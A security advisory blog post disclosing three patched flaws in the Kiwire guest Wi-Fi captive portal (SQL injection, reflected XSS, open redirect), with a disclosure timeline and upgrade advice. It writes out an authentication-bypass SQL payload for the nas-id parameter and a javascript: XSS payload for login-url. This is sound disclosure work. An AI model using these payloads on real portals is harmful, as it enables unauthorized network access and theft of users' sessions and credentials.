During a recent penetration test, LRQA identified three vulnerabilities in Kiwire Captive Portal, a guest Wi-Fi solution developed by SynchroWeb that provides Internet access in public venues such as hotels, malls, and airports. When users connect to the guest Wi-Fi, a captive portal prompts them to register with a valid mobile number and SMS one-time password (OTP) to gain access.
The vulnerabilities – SQL Injection (CVE-2025-11188), Cross-site Scripting (CVE-2025-11189), and Open Redirection (CVE-2025-11190) – were found in the authentication endpoint used during the Wi-Fi login flow. All three have been patched by SynchroWeb as of September 2025.
This post walks through each finding in detail. It's aimed at penetration testers, application security engineers, and anyone responsible for deploying or managing captive portal solutions.
SQL Injection - CVE-2025-11188
During testing, it was observed that on connection to the Wi-Fi, the following endpoint is sent to the backend server to enable a seamless authentication without requiring the user to re-enter their mobile number and OTP.
https://guestwifi.target.com/login/huawei-wlc?&ap-mac=6c71d2<mac>&redirect-url=&ssid=Guest_WiFi&user-ip=192.168.100.156&user-mac=189341<mac>&nas-id=PYLGWIFIWAC01&login-url=www.google.com
The nas-id parameter in this request was identified as being vulnerable to SQL injection.
Submitting an invalid nas-id resulted in an application error.
Figure 1: Invalid nas-id triggers an error response
By appending a Boolean OR condition (‘ OR ‘1’=’1), the validation logic was bypassed and the user was successfully authenticated to the guest Wi-Fi network, confirming the presence of a blind SQL injection attack.
Figure 2: Append OR operand to bypass nas-id check with a TRUE condition
When an attacker submits &nas-id=PYLGWIFIWAC02’ OR ‘1’=’1, the resulting SQL query becomes SELECT * FROM devices where nas_id = PYLGWIFIWAC02’ OR ‘1’=’1’. This condition always evaluates to TRUE, allowing authentication to succeed.
A python proof of concept script was developed to exploit the blind SQL injection.
The script performs blind SQL injection to extract database information char-by-char via error-based inference through the vulnerable nas-id parameter. This logic assumes if no error message appears, the guess was correct (boolean inference).
Figure 3: Sample output
Cross-site Scripting (XSS) - CVE-2025-11189
The same endpoint detailed above includes the login-url parameter, which controls the redirection upon successful authentication.
https://guest.target.com/login/huawei-wlc?&ap-mac=6c71d2<mac>&redirect-url=&ssid=Guest_WiFi&user-ip=192.168.100.156&user-mac=189341<mac>&nas-id=PYLGWIFIWAC01&login-url=www.google.com
Testing revealed that the login-url is vulnerable to a reflected Cross-site Scripting (XSS) attack. The application fails to properly validate or sanitize the login-url parameter and reflects it directly in the HTTP redirect response.
Submitting a payload javascript:alert(document.domain) in the login-url parmeter results in JavaScript execution in the victim’s browser upon redirection.
Figure 4: XSS payload trigger in the login-url parameter
In a real-world scenario, an attacker could craft a malicious Wi-Fi login URL containing a JavaScript payload in the login-url parameter and distribute it through a phishing campaign or by spoofing the captive portal landing page. When a victim clicks the link and authenticates, the XSS payload executes in their browser within the context of the captive portal's domain. This could allow an attacker to steal session tokens, capture credentials entered during the login flow, or redirect users to a convincing phishing page – all under a trusted domain that users have no reason to question, since they expect to interact with it as part of connecting to Wi-Fi.
The risk is heightened by the context in which captive portals operate: users are accustomed to being redirected, prompted for input, and interacting with unfamiliar login pages, making social engineering via XSS particularly effective in this environment.
Open Redirection - CVE-2025-11190
The login-url parameter was also found to be vulnerable to open redirection. By modifying this parameter to point to an attacker-controlled domain, authenticated users could be redirected to a malicious website after successful login.
https://guestwifi.target.com/login/huawei-wlc?&ap-mac=6c71d2<mac>&redirect-url=&ssid=Guest_WiFi&user-ip=192.168.100.156&user-mac=189341<mac>&nas-id=PYLGWIFIWAC01&login-url=www.google.com
This behavior could be abused for phishing attacks or to chain with other client-side exploits.
Figure 5: Open redirection vulnerability in the login-url parameter
Disclosure Process
- 17 July 2025 – Vulnerabilities discovered during penetration test
- 22 July 2025 – Reported to SynchroWeb
- 19 September 2025 – SynchroWeb released a patch in Kiwire version 3.2.3
- 09 October 2025 – CVEs assigned by MITRE
- 10 October 2025 – Coordinated public disclosure via CERT/CC (VU#887923)
Users running Kiwire Captive Portal should update to version 3.2.3 or later. SynchroWeb's security advisory is available at synchroweb.com/release-notes/kiwire/security.
